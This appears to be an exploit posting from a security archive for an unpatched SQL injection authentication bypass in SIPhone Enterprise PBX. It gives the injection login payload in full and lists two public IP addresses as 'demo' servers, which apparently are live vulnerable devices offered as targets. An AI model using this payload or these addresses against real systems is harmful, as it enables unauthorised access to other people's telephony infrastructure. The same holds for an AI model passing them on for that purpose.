SIPhone Enterprise PBX suffers from a remote SQL injection vulnerability that allows for authentication bypass.
d46433623631bc3d4ce7e1609af807e93bcad3cd22ea89953d7aad7cb9d92d65###########################################################################################
## ____ ___ ____ _ E ##
## / ___|_ _| _ \| |__ ___ _ __ ___ X By ##
## \___ \| || |_) | '_ \ / _ \| '_ \ / _ \ P BaD-HaCKeR-MaN ##
## ___) | || __/| | | | (_) | | | | __/ L TheMostCompleteHackerInTheWorld ##
## |____/___|_| |_| |_|\___/|_| |_|\___| O thepunisher_kazamel@skype ##
## I ##
## T ##
###########################################################################################
[+] SIPhone Enterprise PBX Suffers from An authentication bypass vulnerability
[+] Product: SIPhone Enterprise PBX
[+] Vendor: BELLBRIDGE s.r.o.
[+] Vulnerability Type: Authentication Bypass Vulnerability
[+] Risk Level: High
[+] Solution Status: Not Fixed Yet
[+] Discovered and Provided By: BaD-HaCKeR-MaN https://www.facebook.com/TheMostCompleteHackerInTheWorld
[+] Exploit :
By browsing the PBX device and logging by :
Username: a' or 1=1--
Password: Test
[+] Demo Server :
https://94.112.253.250/
https://88.208.65.41/
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed